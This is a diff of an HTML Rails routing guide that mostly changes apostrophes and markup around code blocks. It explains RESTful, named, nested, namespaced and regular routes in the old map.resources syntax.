        @@ -380,10 +379,10 @@ http://www.gnu.org/software/src-highlite -->

        2. Quick Tour of Routes.rb

        -

        There are two components to routing in Rails: the routing engine itself, which is supplied as part of Rails, and the file config/routes.rb, which contains the actual routes that will be used by your application. Learning exactly what you can put in routes.rb is the main topic of this guide, but before we dig in let's get a quick overview.

        +

        There are two components to routing in Rails: the routing engine itself, which is supplied as part of Rails, and the file config/routes.rb, which contains the actual routes that will be used by your application. Learning exactly what you can put in routes.rb is the main topic of this guide, but before we dig in let’s get a quick overview.

        2.1. Processing the File

        -

        In format, routes.rb is nothing more than one big block sent to ActionController::Routing::Routes.draw. Within this block, you can have comments, but it's likely that most of your content will be individual lines of code - each line being a route in your application. You'll find five main types of content in this file:

        -
          +

          In format, routes.rb is nothing more than one big block sent to ActionController::Routing::Routes.draw. Within this block, you can have comments, but it’s likely that most of your content will be individual lines of code - each line being a route in your application. You’ll find five main types of content in this file:

          +
          • RESTful Routes @@ -410,28 +409,26 @@ Default Routes

          -

          Each of these types of route is covered in more detail later in this guide.

          -

          The routes.rb file is processed from top to bottom when a request comes in. The request will be dispatched to the first matching route. If there is no matching route, then Rails returns HTTP status 404 to the caller.

          +

          Each of these types of route is covered in more detail later in this guide.

          +

          The routes.rb file is processed from top to bottom when a request comes in. The request will be dispatched to the first matching route. If there is no matching route, then Rails returns HTTP status 404 to the caller.

          2.2. RESTful Routes

          -

          RESTful routes take advantage of the built-in REST orientation of Rails to wrap up a lot of routing information in a single declaration. A RESTful route looks like this:

          +

          RESTful routes take advantage of the built-in REST orientation of Rails to wrap up a lot of routing information in a single declaration. A RESTful route looks like this:

          -
          map.resources :books
          -
          +
          map.resources :books

        2.3. Named Routes

        -

        Named routes give you very readable links in your code, as well as handling incoming requests. Here's a typical named route:

        +

        Named routes give you very readable links in your code, as well as handling incoming requests. Here’s a typical named route:

        -
        map.login '/login', :controller => 'sessions', :action => 'new'
        -
        +
        map.login '/login', :controller => 'sessions', :action => 'new'

        2.4. Nested Routes

        -

        Nested routes let you declare that one resource is contained within another resource. You'll see later on how this translates to URLs and paths in your code. For example, if your application includes parts, each of which belongs to an assembly, you might have this nested route declaration:

        +

        Nested routes let you declare that one resource is contained within another resource. You’ll see later on how this translates to URLs and paths in your code. For example, if your application includes parts, each of which belongs to an assembly, you might have this nested route declaration:

        map.resources :assemblies do |assemblies|
           assemblies.resources :parts
        -end
        -
        +end

        2.5. Regular Routes

        -

        In many applications, you'll also see non-RESTful routing, which explicitly connects the parts of a URL to a particular action. For example,

        +

        In many applications, you’ll also see non-RESTful routing, which explicitly connects the parts of a URL to a particular action. For example,

        -
        map.connect 'parts/:number', :controller => 'inventory', :action => 'show'
        -
        +
        map.connect 'parts/:number', :controller => 'inventory', :action => 'show'

        2.6. Default Routes

        -

        The default routes are a safety net that catch otherwise-unrouted requests. Many Rails applications will contain this pair of default routes:

        +

        The default routes are a safety net that catch otherwise-unrouted requests. Many Rails applications will contain this pair of default routes:

        map.connect ':controller/:action/:id'
        -map.connect ':controller/:action/:id.:format'
        -
        -

        These default routes are automatically generated when you create a new Rails application. If you're using RESTful routing for everything in your application, you will probably want to remove them. But be sure you're not using the default routes before you remove them!

        +map.connect ':controller/:action/:id.:format' +

        These default routes are automatically generated when you create a new Rails application. If you’re using RESTful routing for everything in your application, you will probably want to remove them. But be sure you’re not using the default routes before you remove them!

        3. RESTful Routing: the Rails Default

        -

        RESTful routing is the current standard for routing in Rails, and it's the one that you should prefer for new applications. It can take a little while to understand how RESTful routing works, but it's worth the effort; your code will be easier to read and you'll be working with Rails, rather than fighting against it, when you use this style of routing.

        +

        RESTful routing is the current standard for routing in Rails, and it’s the one that you should prefer for new applications. It can take a little while to understand how RESTful routing works, but it’s worth the effort; your code will be easier to read and you’ll be working with Rails, rather than fighting against it, when you use this style of routing.

        3.1. What is REST?

        -

        The foundation of RESTful routing is generally considered to be Roy Fielding's doctoral thesis, Architectural Styles and the Design of Network-based Software Architectures. Fortunately, you need not read this entire document to understand how REST works in Rails. REST, an acronym for Representational State Transfer, boils down to two main principles for our purposes:

        -
          +

          The foundation of RESTful routing is generally considered to be Roy Fielding’s doctoral thesis, Architectural Styles and the Design of Network-based Software Architectures. Fortunately, you need not read this entire document to understand how REST works in Rails. REST, an acronym for Representational State Transfer, boils down to two main principles for our purposes:

          +
          • Using resource identifiers (which, for the purposes of discussion, you can think of as URLs) to represent resources @@ -479,19 +473,18 @@ Transferring representations of the state of that resource between system compon

          -

          For example, to a Rails application a request such as this:

          -

          DELETE /photos/17

          -

          would be understood to refer to a photo resource with the ID of 17, and to indicate a desired action - deleting that resource. REST is a natural style for the architecture of web applications, and Rails makes it even more natural by using conventions to shield you from some of the RESTful complexities.

          +

          For example, to a Rails application a request such as this:

          +

          DELETE /photos/17

          +

          would be understood to refer to a photo resource with the ID of 17, and to indicate a desired action - deleting that resource. REST is a natural style for the architecture of web applications, and Rails makes it even more natural by using conventions to shield you from some of the RESTful complexities.

          3.2. CRUD, Verbs, and Actions

          -

          In Rails, a RESTful route provides a mapping between HTTP verbs, controller actions, and (implicitly) CRUD operations in a database. A single entry in the routing file, such as

          +

          In Rails, a RESTful route provides a mapping between HTTP verbs, controller actions, and (implicitly) CRUD operations in a database. A single entry in the routing file, such as

          -
          map.resources :photos
          -
          -

          creates seven different routes in your application:

          +
          map.resources :photos
        +

        creates seven different routes in your application:

        -

        For the specific routes (those that reference just a single resource), the identifier for the resource will be available within the corresponding controller action as params[:id].

        +

        For the specific routes (those that reference just a single resource), the identifier for the resource will be available within the corresponding controller action as params[:id].

        @@ -653,8 +646,8 @@ cellspacing="0" cellpadding="4">

        3.3. URLs and Paths

        -

        Creating a RESTful route will also make available a pile of helpers within your application:

        -
          +

          Creating a RESTful route will also make available a pile of helpers within your application:

          +
          • photos_url and photos_path map to the path for the index and create actions @@ -684,25 +677,23 @@ cellspacing="0" cellpadding="4">

        Because routing makes use of the HTTP verb as well as the path in the request to dispatch requests, the seven routes generated by a RESTful routing entry only give rise to four pairs of helpers.
        -

        In each case, the _url helper generates a string containing the entire URL that the application will understand, while the _path helper generates a string containing the relative path from the root of the application. For example:

        +

        In each case, the _url helper generates a string containing the entire URL that the application will understand, while the _path helper generates a string containing the relative path from the root of the application. For example:

        photos_url  # => "http://www.example.com/photos"
        -photos_path # => "/photos"
        -
        +photos_path # => "/photos"

        3.4. Defining Multiple Resources at the Same Time

        -

        If you need to create routes for more than one RESTful resource, you can save a bit of typing by defining them all with a single call to map.resources:

        +

        If you need to create routes for more than one RESTful resource, you can save a bit of typing by defining them all with a single call to map.resources:

        -
        map.resources :photos, :books, :videos
        -
        -

        This has exactly the same effect as

        +
        map.resources :photos, :books, :videos
    +

    This has exactly the same effect as

    map.resources :photos
     map.resources :books
    -map.resources :videos
    -
    +map.resources :videos

    3.5. Singular Resources

    -

    You can also apply RESTful routing to singleton resources within your application. In this case, you use map.resource instead of map.resources and the route generation is slightly different. For example, a routing entry of

    +

    You can also apply RESTful routing to singleton resources within your application. In this case, you use map.resource instead of map.resources and the route generation is slightly different. For example, a routing entry of

    -
    map.resource :geocoder
    -
    -

    creates six different routes in your application:

    +
    map.resource :geocoder
    +

    creates six different routes in your application:

    Even though the name of the resource is singular in routes.rb, the matching controller is still plural.
    -

    A singular RESTful route generates an abbreviated set of helpers:

    -
      +

      A singular RESTful route generates an abbreviated set of helpers:

      +
      • new_geocoder_url and new_geocoder_path map to the path for the new action @@ -883,8 +872,8 @@ cellspacing="0" cellpadding="4">

      3.6. Customizing Resources

      -

      Although the conventions of RESTful routing are likely to be sufficient for many applications, there are a number of ways to customize the way that RESTful routes work. These options include:

      -
        +

        Although the conventions of RESTful routing are likely to be sufficient for many applications, there are a number of ways to customize the way that RESTful routes work. These options include:

        +
        • :controller @@ -936,17 +925,16 @@ cellspacing="0" cellpadding="4">

        -

        You can also add additional routes via the :member and :collection options, which are discussed later in this guide.

        +

        You can also add additional routes via the :member and :collection options, which are discussed later in this guide.

        3.6.1. Using :controller

        -

        The :controller option lets you use a controller name that is different from the public-facing resource name. For example, this routing entry:

        +

        The :controller option lets you use a controller name that is different from the public-facing resource name. For example, this routing entry:

        -
        map.resources :photos, :controller => "images"
        -
        -

        will recognize incoming URLs containing photo but route the requests to the Images controller:

        +
        map.resources :photos, :controller => "images"
    +

    will recognize incoming URLs containing photo but route the requests to the Images controller:

    - +
    Note The helpers will be generated with the name of the resource, not the name of the controller. So in this case, you'd still get photos_path, new_photo_path, and so on.The helpers will be generated with the name of the resource, not the name of the controller. So in this case, you’d still get photos_path, new_photo_path, and so on.

    3.7. Controller Namespaces and Routing

    -

    Rails allows you to group your controllers into namespaces by saving them in folders underneath app/controllers. The :controller option provides a convenient way to use these routes. For example, you might have a resource whose controller is purely for admin users in the admin folder:

    +

    Rails allows you to group your controllers into namespaces by saving them in folders underneath app/controllers. The :controller option provides a convenient way to use these routes. For example, you might have a resource whose controller is purely for admin users in the admin folder:

    -
    map.resources :adminphotos, :controller => "admin/photos"
    -
    -

    If you use controller namespaces, you need to be aware of a subtlety in the Rails routing code: it always tries to preserve as much of the namespace from the previous request as possible. For example, if you are on a view generated from the adminphoto_path helper, and you follow a link generated with <%= link_to "show", adminphoto(1) %> you will end up on the view generated by admin/photos/show but you will also end up in the same place if you have <%= link_to "show", {:controller ⇒ "photos", :action ⇒ "show"} %> because Rails will generate the show URL relative to the current URL.

    +
    map.resources :adminphotos, :controller => "admin/photos"
    +

    If you use controller namespaces, you need to be aware of a subtlety in the Rails routing code: it always tries to preserve as much of the namespace from the previous request as possible. For example, if you are on a view generated from the adminphoto_path helper, and you follow a link generated with <%= link_to "show", adminphoto(1) %> you will end up on the view generated by admin/photos/show but you will also end up in the same place if you have <%= link_to "show", {:controller => "photos", :action => "show"} %> because Rails will generate the show URL relative to the current URL.

    - +
    Tip If you want to guarantee that a link goes to a top-level controller, use a preceding slash to anchor the controller name: <%= link_to "show", {:controller ⇒ "/photos", :action ⇒ "show"} %>If you want to guarantee that a link goes to a top-level controller, use a preceding slash to anchor the controller name: <%= link_to "show", {:controller => "/photos", :action => "show"} %>
    -

    You can also specify a controller namespace with the :namespace option instead of a path:

    +

    You can also specify a controller namespace with the :namespace option instead of a path:

    -
    map.resources :adminphotos, :namespace => "admin", :controller => "photos"
    -
    -

    This can be especially useful when combined with with_options to map multiple namespaced routes together:

    +
    map.resources :adminphotos, :namespace => "admin", :controller => "photos"
    +

    This can be especially useful when combined with with_options to map multiple namespaced routes together:

    map.with_options(:namespace => "admin") do |admin|
       admin.resources :photos, :videos
    -end
    -
    -

    That would give you routing for admin/photos and admin/videos controllers.

    +end +

    That would give you routing for admin/photos and admin/videos controllers.

    3.7.1. Using :singular

    -

    If for some reason Rails isn't doing what you want in converting the plural resource name to a singular name in member routes, you can override its judgment with the :singular option:

    +

    If for some reason Rails isn’t doing what you want in converting the plural resource name to a singular name in member routes, you can override its judgment with the :singular option:

    -
    map.resources :teeth, :singular => "tooth"
    -
    +
    map.resources :teeth, :singular => "tooth"
    @@ -1161,27 +1145,25 @@ http://www.gnu.org/software/src-highlite -->

    3.7.2. Using :requirements

    -

    You an use the :requirements option in a RESTful route to impose a format on the implied :id parameter in the singular routes. For example:

    +

    You an use the :requirements option in a RESTful route to impose a format on the implied :id parameter in the singular routes. For example:

    -
    map.resources :photos, :requirements => {:id => /[A-Z][A-Z][0-9]+/}
    -
    -

    This declaration constrains the :id parameter to match the supplied regular expression. So, in this case, /photos/1 would no longer be recognized by this route, but /photos/RR27 would.

    +
    map.resources :photos, :requirements => {:id => /[A-Z][A-Z][0-9]+/}
    +

    This declaration constrains the :id parameter to match the supplied regular expression. So, in this case, /photos/1 would no longer be recognized by this route, but /photos/RR27 would.

    3.7.3. Using :conditions

    -

    Conditions in Rails routing are currently used only to set the HTTP verb for individual routes. Although in theory you can set this for RESTful routes, in practice there is no good reason to do so. (You'll learn more about conditions in the discussion of classic routing later in this guide.)

    +

    Conditions in Rails routing are currently used only to set the HTTP verb for individual routes. Although in theory you can set this for RESTful routes, in practice there is no good reason to do so. (You’ll learn more about conditions in the discussion of classic routing later in this guide.)

    3.7.4. Using :as

    -

    The :as option lets you override the normal naming for the actual generated paths. For example:

    +

    The :as option lets you override the normal naming for the actual generated paths. For example:

    -
    map.resources :photos, :as => "images"
    -
    -

    will recognize incoming URLs containing image but route the requests to the Photos controller:

    +
    map.resources :photos, :as => "images"
    +

    will recognize incoming URLs containing image but route the requests to the Photos controller:

    - +
    Note The helpers will be generated with the name of the resource, not the path name. So in this case, you'd still get photos_path, new_photo_path, and so on.The helpers will be generated with the name of the resource, not the path name. So in this case, you’d still get photos_path, new_photo_path, and so on.

    3.7.5. Using :path_names

    -

    The :path_names option lets you override the automatically-generated "new" and "edit" segments in URLs:

    +

    The :path_names option lets you override the automatically-generated "new" and "edit" segments in URLs:

    -
    map.resources :photos, :path_names => { :new => 'make', :edit => 'change' }
    -
    -

    This would cause the routing to recognize URLs such as

    +
    map.resources :photos, :path_names => { :new => 'make', :edit => 'change' }
    +

    This would cause the routing to recognize URLs such as

    /photos/make
    @@ -1361,7 +1342,7 @@ http://www.gnu.org/software/src-highlite -->
     
     Note
     
    -The actual action names aren't changed by this option; the two URLs show would still route to the new and edit actions.
    +The actual action names aren’t changed by this option; the two URLs show would still route to the new and edit actions.
     
     
    @@ -1377,18 +1358,16 @@ http://www.gnu.org/software/src-highlite --> by Lorenzo Bettini http://www.lorenzobettini.it http://www.gnu.org/software/src-highlite --> -
    config.action_controller.resources_path_names = { :new => 'make', :edit => 'change' }
    -
    +
    config.action_controller.resources_path_names = { :new => 'make', :edit => 'change' }

    3.7.6. Using :path_prefix

    -

    The :path_prefix option lets you add additional parameters that will be prefixed to the recognized paths. For example, suppose each photo in your application belongs to a particular photographer. In that case, you might declare this route:

    +

    The :path_prefix option lets you add additional parameters that will be prefixed to the recognized paths. For example, suppose each photo in your application belongs to a particular photographer. In that case, you might declare this route:

    -
    map.resources :photos, :path_prefix => '/photographers/:photographer_id'
    -
    -

    Routes recognized by this entry would include:

    +
    map.resources :photos, :path_prefix => '/photographers/:photographer_id'
    +

    Routes recognized by this entry would include:

    /photographers/1/photos/2
    @@ -1399,7 +1378,7 @@ http://www.gnu.org/software/src-highlite -->
     
     Note
     
    -In most cases, it's simpler to recognize URLs of this sort by creating nested resources, as discussed in the next section.
    +In most cases, it’s simpler to recognize URLs of this sort by creating nested resources, as discussed in the next section.
     
     
    @@ -1411,16 +1390,15 @@ http://www.gnu.org/software/src-highlite -->

    3.7.7. Using :name_prefix

    -

    You can use the :name_prefix option to avoid collisions between routes. This is most useful when you have two resources with the same name that use :path_prefix to map differently. For example:

    +

    You can use the :name_prefix option to avoid collisions between routes. This is most useful when you have two resources with the same name that use :path_prefix to map differently. For example:

    map.resources :photos, :path_prefix => '/photographers/:photographer_id', :name_prefix => 'photographer_'
    -map.resources :photos, :path_prefix => '/agencies/:agency_id', :name_prefix => 'agency_'
    -
    -

    This combination will give you route helpers such as photographer_photos_path and agency_edit_photo_path to use in your code.

    +map.resources :photos, :path_prefix => '/agencies/:agency_id', :name_prefix => 'agency_'
    +

    This combination will give you route helpers such as photographer_photos_path and agency_edit_photo_path to use in your code.

    @@ -1430,25 +1408,23 @@ map.resources :

    3.7.8. Using :only and :except

    -

    By default, Rails creates routes for all seven of the default actions (index, show, new, create, edit, update, and destroy) for every RESTful route in your application. You can use the :only and :except options to fine-tune this behavior. The :only option specifies that only certain routes should be generated:

    +

    By default, Rails creates routes for all seven of the default actions (index, show, new, create, edit, update, and destroy) for every RESTful route in your application. You can use the :only and :except options to fine-tune this behavior. The :only option specifies that only certain routes should be generated:

    -
    map.resources :photos, :only => [:index, :show]
    -
    -

    With this declaration, a GET request to /photos would succeed, but a POST request to /photos (which would ordinarily be routed to the create action) will fail.

    -

    The :except option specifies a route or list of routes that should not be generated:

    +
    map.resources :photos, :only => [:index, :show]
    +

    With this declaration, a GET request to /photos would succeed, but a POST request to /photos (which would ordinarily be routed to the create action) will fail.

    +

    The :except option specifies a route or list of routes that should not be generated:

    -
    map.resources :photos, :except => :destroy
    -
    -

    In this case, all of the normal routes except the route for destroy (a DELETE request to /photos/id) will be generated.

    -

    In addition to an action or a list of actions, you can also supply the special symbols :all or :none to the :only and :except options.

    +
    map.resources :photos, :except => :destroy
    +

    In this case, all of the normal routes except the route for destroy (a DELETE request to /photos/id) will be generated.

    +

    In addition to an action or a list of actions, you can also supply the special symbols :all or :none to the :only and :except options.

    @@ -1458,7 +1434,7 @@ http://www.gnu.org/software/src-highlite -->

    3.8. Nested Resources

    -

    It's common to have resources that are logically children of other resources. For example, suppose your application includes these models:

    +

    It’s common to have resources that are logically children of other resources. For example, suppose your application includes these models:

    class Ad < ActiveRecord::Base belongs_to :magazine -end -
    -

    Each ad is logically subservient to one magazine. Nested routes allow you to capture this relationship in your routing. In this case, you might include this route declaration:

    +end +

    Each ad is logically subservient to one magazine. Nested routes allow you to capture this relationship in your routing. In this case, you might include this route declaration:

    map.resources :magazines do |magazine|
       magazine.resources :ads
    -end
    -
    -

    In addition to the routes for magazines, this declaration will also create routes for ads, each of which requires the specification of a magazine in the URL:

    +end +

    In addition to the routes for magazines, this declaration will also create routes for ads, each of which requires the specification of a magazine in the URL:

    -

    This will also create routing helpers such as magazine_ads_url and edit_magazine_ad_path.

    +

    This will also create routing helpers such as magazine_ads_url and edit_magazine_ad_path.

    3.8.1. Using :name_prefix

    -

    The :name_prefix option overrides the automatically-generated prefix in nested route helpers. For example,

    +

    The :name_prefix option overrides the automatically-generated prefix in nested route helpers. For example,

    map.resources :magazines do |magazine|
       magazine.resources :ads, :name_prefix => 'periodical'
    -end
    -
    -

    This will create routing helpers such as periodical_ads_url and periodical_edit_ad_path. You can even use :name_prefix to suppress the prefix entirely:

    +end +

    This will create routing helpers such as periodical_ads_url and periodical_edit_ad_path. You can even use :name_prefix to suppress the prefix entirely:

    map.resources :magazines do |magazine|
       magazine.resources :ads, :name_prefix => nil
    -end
    -
    -

    This will create routing helpers such as ads_url and edit_ad_path. Note that calling these will still require supplying an article id:

    +end +

    This will create routing helpers such as ads_url and edit_ad_path. Note that calling these will still require supplying an article id:

    ads_url(@magazine)
    -edit_ad_path(@magazine, @ad)
    -
    +edit_ad_path(@magazine, @ad)

    3.8.2. Using :has_one and :has_many

    -

    The :has_one and :has_many options provide a succinct notation for simple nested routes. Use :has_one to nest a singleton resource, or :has_many to nest a plural resource:

    +

    The :has_one and :has_many options provide a succinct notation for simple nested routes. Use :has_one to nest a singleton resource, or :has_many to nest a plural resource:

    -
    map.resources :photos, :has_one => :photographer, :has_many => [:publications, :versions]
    -
    -

    This has the same effect as this set of declarations:

    +
    map.resources :photos, :has_one => :photographer, :has_many => [:publications, :versions]
    +

    This has the same effect as this set of declarations:

    photo.resource :photographer photo.resources :publications photo.resources :versions -end -
    +end

    3.8.3. Limits to Nesting

    -

    You can nest resources within other nested resources if you like. For example:

    +

    You can nest resources within other nested resources if you like. For example:

    publisher.resources :magazines do |magazine| magazine.resources :photos end -end -
    -

    However, without the use of name_prefix ⇒ nil, deeply-nested resources quickly become cumbersome. In this case, for example, the application would recognize URLs such as

    +end +

    However, without the use of name_prefix => nil, deeply-nested resources quickly become cumbersome. In this case, for example, the application would recognize URLs such as

    /publishers/1/magazines/2/photos/3
    -

    The corresponding route helper would be publisher_magazine_photo_url, requiring you to specify objects at all three levels. Indeed, this situation is confusing enough that a popular article by Jamis Buck proposes a rule of thumb for good Rails design:

    -

    Resources should never be nested more than 1 level deep.

    +

    The corresponding route helper would be publisher_magazine_photo_url, requiring you to specify objects at all three levels. Indeed, this situation is confusing enough that a popular article by Jamis Buck proposes a rule of thumb for good Rails design:

    +

    Resources should never be nested more than 1 level deep.

    3.8.4. Shallow Nesting

    -

    The :shallow option provides an elegant solution to the difficulties of deeply-nested routes. If you specify this option at any level of routing, then paths for nested resources which reference a specific member (that is, those with an :id parameter) will not use the parent path prefix or name prefix. To see what this means, consider this set of routes:

    +

    The :shallow option provides an elegant solution to the difficulties of deeply-nested routes. If you specify this option at any level of routing, then paths for nested resources which reference a specific member (that is, those with an :id parameter) will not use the parent path prefix or name prefix. To see what this means, consider this set of routes:

    publisher.resources :magazines do |magazine| magazine.resources :photos end -end -
    -

    This will enable recognition of (among others) these routes:

    +end +

    This will enable recognition of (among others) these routes:

    /publishers/1           ==> publisher_path(1)
    @@ -1728,16 +1695,15 @@ http://www.gnu.org/software/src-highlite -->
     /magazines/2/photos     ==> magazines_photos_path(2)
     /photos/3               ==> photo_path(3)
    -

    With shallow nesting, you need only supply enough information to uniquely identify the resource that you want to work with. If you like, you can combine shallow nesting with the :has_one and :has_many options:

    +

    With shallow nesting, you need only supply enough information to uniquely identify the resource that you want to work with. If you like, you can combine shallow nesting with the :has_one and :has_many options:

    -
    map.resources :publishers, :has_many => { :magazines => :photos }, :shallow => true
    -
    +
    map.resources :publishers, :has_many => { :magazines => :photos }, :shallow => true

    3.9. Route Generation from Arrays

    -

    In addition to using the generated routing helpers, Rails can also generate RESTful routes from an array of parameters. For example, suppose you have a set of routes generated with these entries in routes.rb:

    +

    In addition to using the generated routing helpers, Rails can also generate RESTful routes from an array of parameters. For example, suppose you have a set of routes generated with these entries in routes.rb:

    map.resources :magazines do |magazine|
       magazine.resources :ads
    -end
    -
    -

    Rails will generate helpers such as magazine_ad_path that you can use in building links:

    +end +

    Rails will generate helpers such as magazine_ad_path that you can use in building links:

    -
    <%= link_to "Ad details", magazine_ad_path(@magazine, @ad) %>
    -
    -

    Another way to refer to the same route is with an array of objects:

    +
    <%= link_to "Ad details", magazine_ad_path(@magazine, @ad) %>
    +

    Another way to refer to the same route is with an array of objects:

    -
    <%= link_to "Ad details", [@magazine, @ad] %>
    -
    -

    This format is especially useful when you might not know until runtime which of several types of object will be used in a particular link.

    +
    <%= link_to "Ad details", [@magazine, @ad] %>
    +

    This format is especially useful when you might not know until runtime which of several types of object will be used in a particular link.

    3.10. Namespaced Resources

    -

    It's possible to do some quite complex things by combining :path_prefix and :name_prefix. For example, you can use the combination of these two options to move administrative resources to their own folder in your application:

    +

    It’s possible to do some quite complex things by combining :path_prefix and :name_prefix. For example, you can use the combination of these two options to move administrative resources to their own folder in your application:

    map.resources :photos, :path_prefix => 'admin', :controller => 'admin/photos'
     map.resources :tags, :name_prefix => 'admin_photo_', :path_prefix => 'admin/photos/:photo_id', :controller => 'admin/photo_tags'
    -map.resources :ratings, :name_prefix => 'admin_photo_', :path_prefix => 'admin/photos/:photo_id', :controller => 'admin/photo_ratings'
    -
    -

    The good news is that if you find yourself using this level of complexity, you can stop. Rails supports namespaced resources to make placing resources in their own folder a snap. Here's the namespaced version of those same three routes:

    +map.resources :ratings, :name_prefix => 'admin_photo_', :path_prefix => 'admin/photos/:photo_id', :controller => 'admin/photo_ratings' +

    The good news is that if you find yourself using this level of complexity, you can stop. Rails supports namespaced resources to make placing resources in their own folder a snap. Here’s the namespaced version of those same three routes:

    map.namespace(:admin) do |admin|
             admin.resources :photos,
               :has_many => { :tags, :ratings}
    -end
    -
    -

    As you can see, the namespaced version is much more succinct than the one that spells everything out - but it still creates the same routes. For example, you'll get admin_photos_url that expects to find an Admin::PhotosController and that matches admin/photos, and admin_photos_ratings_path that matches /admin/photos/photo_id/ratings, expecting to use Admin::RatingsController. Even though you're not specifying path_prefix explicitly, the routing code will calculate the appropriate path_prefix from the route nesting.

    +end +

    As you can see, the namespaced version is much more succinct than the one that spells everything out - but it still creates the same routes. For example, you’ll get admin_photos_url that expects to find an Admin::PhotosController and that matches admin/photos, and admin_photos_ratings_path that matches /admin/photos/photo_id/ratings, expecting to use Admin::RatingsController. Even though you’re not specifying path_prefix explicitly, the routing code will calculate the appropriate path_prefix from the route nesting.

    3.11. Adding More RESTful Actions

    -

    You are not limited to the seven routes that RESTful routing creates by default. If you like, you may add additional member routes (those which apply to a single instance of the resource), additional new routes (those that apply to creating a new resource), or additional collection routes (those which apply to the collection of resources as a whole).

    +

    You are not limited to the seven routes that RESTful routing creates by default. If you like, you may add additional member routes (those which apply to a single instance of the resource), additional new routes (those that apply to creating a new resource), or additional collection routes (those which apply to the collection of resources as a whole).

    3.11.1. Adding Member Routes

    -

    To add a member route, use the :member option:

    +

    To add a member route, use the :member option:

    -
    map.resources :photos, :member => { :preview => :get }
    -
    -

    This will enable Rails to recognize URLs such as /photos/1/preview using the GET HTTP verb, and route them to the preview action of the Photos controller. It will also create a preview_photo route helper.

    -

    Within the hash of member routes, each route name specifies the HTTP verb that it will recognize. You can use :get, :put, :post, :delete, or :any here. You can also specify an array of methods, if you need more than one but you don't want to allow just anything:

    +
    map.resources :photos, :member => { :preview => :get }
    +

    This will enable Rails to recognize URLs such as /photos/1/preview using the GET HTTP verb, and route them to the preview action of the Photos controller. It will also create a preview_photo route helper.

    +

    Within the hash of member routes, each route name specifies the HTTP verb that it will recognize. You can use :get, :put, :post, :delete, or :any here. You can also specify an array of methods, if you need more than one but you don’t want to allow just anything:

    -
    map.resources :photos, :member => { :prepare => [:get, :post] }
    -
    +
    map.resources :photos, :member => { :prepare => [:get, :post] }

    3.11.2. Adding Collection Routes

    -

    To add a collection route, use the :collection option:

    +

    To add a collection route, use the :collection option:

    -
    map.resources :photos, :collection => { :search => :get }
    -
    -

    This will enable Rails to recognize URLs such as /photos/search using the GET HTTP verb, and route them to the search action of the Photos controller. It will also create a search_photos route helper.

    -

    Just as with member routes, you can specify an array of methods for a collection route:

    +
    map.resources :photos, :collection => { :search => :get }
    +

    This will enable Rails to recognize URLs such as /photos/search using the GET HTTP verb, and route them to the search action of the Photos controller. It will also create a search_photos route helper.

    +

    Just as with member routes, you can specify an array of methods for a collection route:

    -
    map.resources :photos, :collection => { :search => [:get, :post] }
    -
    +
    map.resources :photos, :collection => { :search => [:get, :post] }

    3.11.3. Adding New Routes

    -

    To add a new route (one that creates a new resource), use the :new option:

    +

    To add a new route (one that creates a new resource), use the :new option:

    -
    map.resources :photos, :new => { :upload => :post }
    -
    -

    This will enable Rails to recognize URLs such as /photos/upload using the POST HTTP verb, and route them to the upload action of the Photos controller. It will also create a upload_photos route helper.

    +
    map.resources :photos, :new => { :upload => :post }
    +

    This will enable Rails to recognize URLs such as /photos/upload using the POST HTTP verb, and route them to the upload action of the Photos controller. It will also create a upload_photos route helper.

    @@ -1848,127 +1804,115 @@ http://www.gnu.org/software/src-highlite --> by Lorenzo Bettini http://www.lorenzobettini.it http://www.gnu.org/software/src-highlite --> -
    map.resources :photos, :new => { :new => :any }
    -
    -

    This will allow the new action to be invoked by any request to photos/new, no matter what HTTP verb you use.

    +
    map.resources :photos, :new => { :new => :any }
    +

    This will allow the new action to be invoked by any request to photos/new, no matter what HTTP verb you use.

    3.11.4. A Note of Caution

    -

    If you find yourself adding many extra actions to a RESTful route, it's time to stop and ask yourself whether you're disguising the presence of another resource that would be better split off on its own. When the :member and :collection hashes become a dumping-ground, RESTful routes lose the advantage of easy readability that is one of their strongest points.

    +

    If you find yourself adding many extra actions to a RESTful route, it’s time to stop and ask yourself whether you’re disguising the presence of another resource that would be better split off on its own. When the :member and :collection hashes become a dumping-ground, RESTful routes lose the advantage of easy readability that is one of their strongest points.

    4. Regular Routes

    -

    In addition to RESTful routing, Rails supports regular routing - a way to map URLs to controllers and actions. With regular routing, you don't get the masses of routes automatically generated by RESTful routing. Instead, you must set up each route within your application separately.

    -

    While RESTful routing has become the Rails standard, there are still plenty of places where the simpler regular routing works fine. You can even mix the two styles within a single application. In general, you should prefer RESTful routing when possible, because it will make parts of your application easier to write. But there's no need to try to shoehorn every last piece of your application into a RESTful framework if that's not a good fit.

    +

    In addition to RESTful routing, Rails supports regular routing - a way to map URLs to controllers and actions. With regular routing, you don’t get the masses of routes automatically generated by RESTful routing. Instead, you must set up each route within your application separately.

    +

    While RESTful routing has become the Rails standard, there are still plenty of places where the simpler regular routing works fine. You can even mix the two styles within a single application. In general, you should prefer RESTful routing when possible, because it will make parts of your application easier to write. But there’s no need to try to shoehorn every last piece of your application into a RESTful framework if that’s not a good fit.

    4.1. Bound Parameters

    -

    When you set up a regular route, you supply a series of symbols that Rails maps to parts of an incoming HTTP request. Two of these symbols are special: :controller maps to the name of a controller in your application, and :action maps to the name of an action within that controller. For example, consider one of the default Rails routes:

    +

    When you set up a regular route, you supply a series of symbols that Rails maps to parts of an incoming HTTP request. Two of these symbols are special: :controller maps to the name of a controller in your application, and :action maps to the name of an action within that controller. For example, consider one of the default Rails routes:

    -
    map.connect ':controller/:action/:id'
    -
    -

    If an incoming request of /photos/show/1 is processed by this route (because it hasn't matched any previous route in the file), then the result will be to invoke the show action of the Photos controller, and to make the final parameter (1) available as params[:id].

    +
    map.connect ':controller/:action/:id'
    +

    If an incoming request of /photos/show/1 is processed by this route (because it hasn’t matched any previous route in the file), then the result will be to invoke the show action of the Photos controller, and to make the final parameter (1) available as params[:id].

    4.2. Wildcard Components

    -

    You can set up as many wildcard symbols within a regular route as you like. Anything other than :controller or :action will be available to the matching action as part of the params hash. So, if you set up this route:

    +

    You can set up as many wildcard symbols within a regular route as you like. Anything other than :controller or :action will be available to the matching action as part of the params hash. So, if you set up this route:

    -
    map.connect ':controller/:action/:id/:user_id'
    -
    -

    An incoming URL of /photos/show/1/2 will be dispatched to the show action of the Photos controller. params[:id] will be set to 1, and params[:user_id] will be set to 2.

    +
    map.connect ':controller/:action/:id/:user_id'
    +

    An incoming URL of /photos/show/1/2 will be dispatched to the show action of the Photos controller. params[:id] will be set to 1, and params[:user_id] will be set to 2.

    4.3. Static Text

    -

    You can specify static text when creating a route. In this case, the static text is used only for matching the incoming requests:

    +

